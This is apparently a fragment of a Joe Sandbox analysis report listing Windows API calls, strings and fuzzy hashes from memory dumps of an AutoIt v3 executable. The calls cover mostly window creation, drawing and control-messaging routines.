                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0018D11C
                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0018D128
                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 0018D142
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0018D151
                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0018D17C
                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 0018D184
                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0018D18B
                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 0018D19A
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0018D1A1
                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0018D1EC
                                                                                                                                                          • FillRect.USER32(?,?,00000000), ref: 0018D21E
                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0018D249
                                                                                                                                                            • Part of subcall function 0018D385: GetSysColor.USER32(00000012), ref: 0018D3BE
                                                                                                                                                            • Part of subcall function 0018D385: SetTextColor.GDI32(?,?), ref: 0018D3C2
                                                                                                                                                            • Part of subcall function 0018D385: GetSysColorBrush.USER32(0000000F), ref: 0018D3D8
                                                                                                                                                            • Part of subcall function 0018D385: GetSysColor.USER32(0000000F), ref: 0018D3E3
                                                                                                                                                            • Part of subcall function 0018D385: GetSysColor.USER32(00000011), ref: 0018D400
                                                                                                                                                            • Part of subcall function 0018D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0018D40E
                                                                                                                                                            • Part of subcall function 0018D385: SelectObject.GDI32(?,00000000), ref: 0018D41F
                                                                                                                                                            • Part of subcall function 0018D385: SetBkColor.GDI32(?,00000000), ref: 0018D428
                                                                                                                                                            • Part of subcall function 0018D385: SelectObject.GDI32(?,?), ref: 0018D435
                                                                                                                                                            • Part of subcall function 0018D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0018D454
                                                                                                                                                            • Part of subcall function 0018D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0018D46B
                                                                                                                                                            • Part of subcall function 0018D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0018D480
                                                                                                                                                            • Part of subcall function 0018D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0018D4A8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                          • String ID:
                                                                                                                                                          APIs
                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 0017A42A
                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0017A4E9
                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0017A527
                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0017A539
                                                                                                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0017A57F
                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0017A58B
                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0017A5CF
                                                                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0017A5DE
                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 0017A5EE
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0017A5F2
                                                                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0017A602
                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0017A60B
                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0017A614
                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0017A642
                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0017A659
                                                                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0017A694
                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0017A6A8
                                                                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0017A6B9
                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0017A6E9
                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 0017A6F4
                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0017A6FF
                                                                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0017A709
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0016E45E
                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,001BDC88,?,\\.\,001BDBF0), ref: 0016E54B
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,001BDC88,?,\\.\,001BDBF0), ref: 0016E6B1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __wcsnicmp
                                                                                                                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                          • API String ID: 1038674560-86951937
                                                                                                                                                          • Opcode ID: 2b767168984348e07136d959fe5b325fb5ba6f50e44e1d729c2ea6fda600e3dc
                                                                                                                                                          • Instruction ID: 20e0add45b0ee1aa63b9c197b43edb3c44d595dc2b334af1110e7b2b931d17e5
                                                                                                                                                          • Opcode Fuzzy Hash: 2b767168984348e07136d959fe5b325fb5ba6f50e44e1d729c2ea6fda600e3dc
                                                                                                                                                          • Instruction Fuzzy Hash: 57612B3164032677DB29AA64BC83FBF3398EF25740F144025FE55A71D2EB60DA61C6E1
                                                                                                                                                          APIs
                                                                                                                                                          • DestroyWindow.USER32 ref: 00124956
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00124998
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001249A3
                                                                                                                                                          • DestroyCursor.USER32(00000000), ref: 001249AE
                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 001249B9
                                                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0019E179
                                                                                                                                                          • 6FC10200.COMCTL32(?,000000FF,?), ref: 0019E1B2
                                                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0019E5E0
                                                                                                                                                            • Part of subcall function 001249CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00124954,00000000), ref: 00124A23
                                                                                                                                                          • SendMessageW.USER32 ref: 0019E627
                                                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0019E63E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DestroyMessageSendWindow$DeleteObject$C10200CursorInvalidateMoveRect
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 3760363253-4108050209
                                                                                                                                                          • Opcode ID: 99d1a216076addc5c9e903b9c29101914135da57c914c01fddd4fde96363e4d0
                                                                                                                                                          • Instruction ID: ad884078f57f79577e8a16e76ff68826405e07dff2650cd7031949b965a89f56
                                                                                                                                                          • Opcode Fuzzy Hash: 99d1a216076addc5c9e903b9c29101914135da57c914c01fddd4fde96363e4d0
                                                                                                                                                          • Instruction Fuzzy Hash: 6B12BF30600611EFDF24CF24D884BAABBE5BF19304F144569F99ADB662C731EC95CB91
                                                                                                                                                          APIs
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0018C598
                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0018C64E
                                                                                                                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 0018C669
                                                                                                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0018C925
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Window
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 2326795674-4108050209
                                                                                                                                                          • Opcode ID: 1fabd79d8c4d8586938b9a56e2dd2f43015808189d91903ad7138b544139de38
                                                                                                                                                          • Instruction ID: 6da3e7281d38737b4e7db9bb093e7b496974e4f46965e8bc4f47c63e03d8da0a
                                                                                                                                                          • Opcode Fuzzy Hash: 1fabd79d8c4d8586938b9a56e2dd2f43015808189d91903ad7138b544139de38
                                                                                                                                                          • Instruction Fuzzy Hash: 27F1F371204741AFE719EF24C885BAABBE4FF49354F080629F589976A1D770DA40CFE2
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(?,?,001BDBF0), ref: 00186245
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper
                                                                                                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                          • API String ID: 3964851224-45149045
                                                                                                                                                          • Opcode ID: 0ffbf28d59feafbdbe7e1f94e4cdcaa52bbd61b5a6a81c3fb653957927e572a1
                                                                                                                                                          • Instruction ID: e99a5794257ee4405d720dde9d98f6ab46dcf1039988a418aab3ea17d44fe98a
                                                                                                                                                          • Opcode Fuzzy Hash: 0ffbf28d59feafbdbe7e1f94e4cdcaa52bbd61b5a6a81c3fb653957927e572a1
                                                                                                                                                          • Instruction Fuzzy Hash: 51C16034604201CFCB08FF54D551A6E77A6AFA4394F14486DF8966B3A6DB31DE0ACF82
                                                                                                                                                          APIs
                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 0018D3BE
                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 0018D3C2
                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0018D3D8
                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0018D3E3
                                                                                                                                                          • CreateSolidBrush.GDI32(?), ref: 0018D3E8
                                                                                                                                                          • GetSysColor.USER32(00000011), ref: 0018D400
                                                                                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0018D40E
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0018D41F
                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0018D428
                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0018D435
                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0018D454
                                                                                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0018D46B
                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0018D480
                                                                                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0018D4A8
                                                                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0018D4CF
                                                                                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0018D4ED
                                                                                                                                                          • DrawFocusRect.USER32(?,?), ref: 0018D4F8
                                                                                                                                                          • GetSysColor.USER32(00000011), ref: 0018D506
                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0018D50E
                                                                                                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0018D522
                                                                                                                                                          • SelectObject.GDI32(?,0018D0B5), ref: 0018D539
                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0018D544
                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0018D54A
                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0018D54F
                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 0018D555
                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0018D55F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1996641542-0
                                                                                                                                                          • Opcode ID: da55a0ad9402962bcec12c4e379e08b04f281fb5493988e68869dea15d87c4d6
                                                                                                                                                          • Instruction ID: 60e6bb0a7c1428075f14af94fab2c2590805a9ddb0da60e5087529e3784b4d8e
                                                                                                                                                          • Opcode Fuzzy Hash: da55a0ad9402962bcec12c4e379e08b04f281fb5493988e68869dea15d87c4d6
                                                                                                                                                          • Instruction Fuzzy Hash: 3F514DB1900608BFDF10AFA4EC48EAE7BB9FF09320F114515F916AB6A1D7719A80CF50
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0018B5C0
                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0018B5D1
                                                                                                                                                          • CharNextW.USER32(0000014E), ref: 0018B600
                                                                                                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0018B641
                                                                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0018B657
                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0018B668
                                                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0018B685
                                                                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 0018B6D7
                                                                                                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0018B6ED
                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0018B71E
                                                                                                                                                          • _memset.LIBCMT ref: 0018B743
                                                                                                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0018B78C
                                                                                                                                                          • _memset.LIBCMT ref: 0018B7EB
                                                                                                                                                          • SendMessageW.USER32 ref: 0018B815
                                                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0018B86D
                                                                                                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0018B91A
                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0018B93C
                                                                                                                                                          • GetMenuItemInfoW.USER32(?), ref: 0018B986
                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0018B9B3
                                                                                                                                                          • DrawMenuBar.USER32(?), ref: 0018B9C2
                                                                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 0018B9EA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 1073566785-4108050209
                                                                                                                                                          • Opcode ID: 4373e8ba090a0ba34959a8fb469b2faef2d72fcadd14943c649e0a32b87af7ec
                                                                                                                                                          • Instruction ID: e150a60d9a99d667efa4f67c12c2bd18008050e959fab1f2ad64d10a2e59cff0
                                                                                                                                                          • Opcode Fuzzy Hash: 4373e8ba090a0ba34959a8fb469b2faef2d72fcadd14943c649e0a32b87af7ec
                                                                                                                                                          • Instruction Fuzzy Hash: F5E16B71904219ABDF25AFA1DCC4EEE7BB8FF05714F108156F919AB290DB748A81CF60
                                                                                                                                                          APIs
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00187587
                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0018759C
                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001875A3
                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00187605
                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00187631
                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0018765A
                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00187678
                                                                                                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0018769E
                                                                                                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 001876B3
                                                                                                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001876C6
                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 001876E6
                                                                                                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00187701
                                                                                                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00187715
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0018772D
                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00187753
                                                                                                                                                          • GetMonitorInfoW.USER32 ref: 0018776D
                                                                                                                                                          • CopyRect.USER32(?,?), ref: 00187784
                                                                                                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 001877EF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                                                          • Opcode ID: 11b52c40827814489f1ebb5b6bee621be1fcfe251d915ef991111eefd3bf8144
                                                                                                                                                          • Instruction ID: 021d27658d651fe8e583c241eddf8d9dbfa7367c02706f153aa4845d479cd6ce
                                                                                                                                                          • Opcode Fuzzy Hash: 11b52c40827814489f1ebb5b6bee621be1fcfe251d915ef991111eefd3bf8144
                                                                                                                                                          • Instruction Fuzzy Hash: 7BB1BD71608700AFDB04EF64D988B6ABBE5FF98310F10891DF58A9B291DB70E904CF91
                                                                                                                                                          APIs
                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013A839
                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 0013A841
                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013A86C
                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 0013A874
                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 0013A899
                                                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0013A8B6
                                                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0013A8C6
                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0013A8F9
                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0013A90D
                                                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 0013A92B
                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 0013A947
                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0013A952
                                                                                                                                                            • Part of subcall function 0013B736: GetCursorPos.USER32(000000FF), ref: 0013B749
                                                                                                                                                            • Part of subcall function 0013B736: ScreenToClient.USER32(00000000,000000FF), ref: 0013B766
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000001), ref: 0013B78B
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000002), ref: 0013B799
                                                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,0013ACEE), ref: 0013A979
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                                                                          • API String ID: 1458621304-248962490
                                                                                                                                                          • Opcode ID: 6a15d599361d9851bbbca2dbedf207cfceebc4bbfd85e1c454c564f5bf08ce20
                                                                                                                                                          • Instruction ID: ed50b3a3a53207960bab1ec6f10fb08b42cce07c669bcc3c79094a5bec83f90c
                                                                                                                                                          • Opcode Fuzzy Hash: 6a15d599361d9851bbbca2dbedf207cfceebc4bbfd85e1c454c564f5bf08ce20
                                                                                                                                                          • Instruction Fuzzy Hash: A2B17B71A0020AEFDB14DFA8DC85BAD7BB4FF08314F114229FA56A7690DB74E851CB51
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00186A52
                                                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00186B12
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                          • API String ID: 3974292440-719923060
                                                                                                                                                          • Opcode ID: 2f612e85b348881578482f5d089bc00a7abb26eb3f380a113d60783aa885c418
                                                                                                                                                          • Instruction ID: 495a3266b33032f71446b360bc906a4e2dbd1b77560fc58305e011ae1e9c7d0a
                                                                                                                                                          • Opcode Fuzzy Hash: 2f612e85b348881578482f5d089bc00a7abb26eb3f380a113d60783aa885c418
                                                                                                                                                          • Instruction Fuzzy Hash: 2EA152306047019FCB08FF14D951A6AB7A5FF65354F14896DF8A6AB392DB30EE06CB81
                                                                                                                                                          APIs
                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0015DD87
                                                                                                                                                          • __swprintf.LIBCMT ref: 0015DE28
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015DE3B
                                                                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0015DE90
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015DECC
                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0015DF03
                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0015DF55
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0015DF8B
                                                                                                                                                          • GetParent.USER32(?), ref: 0015DFA9
                                                                                                                                                          • ScreenToClient.USER32(00000000), ref: 0015DFB0
                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0015E02A
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E03E
                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0015E064
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E078
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                          • String ID: %s%u
                                                                                                                                                          • API String ID: 3119225716-679674701
                                                                                                                                                          • Opcode ID: 8b1e15c84486b10568a9b549f5bcfa2f64c44d2bc4ff9e38762da23cccea95fe
                                                                                                                                                          • Instruction ID: c4ea3d9f508cf8e111ea376c36f1a5d69241657d7bf66cd45980fb8ad4850921
                                                                                                                                                          • Opcode Fuzzy Hash: 8b1e15c84486b10568a9b549f5bcfa2f64c44d2bc4ff9e38762da23cccea95fe
                                                                                                                                                          • Instruction Fuzzy Hash: 7DA1D171604706EFDB18DF60D884BAAB7E8FF14311F004529FDAACA190DB70EA49CB91
                                                                                                                                                          APIs
                                                                                                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0015E6E1
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E6F2
                                                                                                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0015E71A
                                                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0015E737
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E755
                                                                                                                                                          • _wcsstr.LIBCMT ref: 0015E766
                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0015E79E
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E7AE
                                                                                                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0015E7D5
                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0015E81E
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E82E
                                                                                                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0015E856
                                                                                                                                                          • GetWindowRect.USER32(00000004,?), ref: 0015E8BF
                                                                                                                                                          Strings
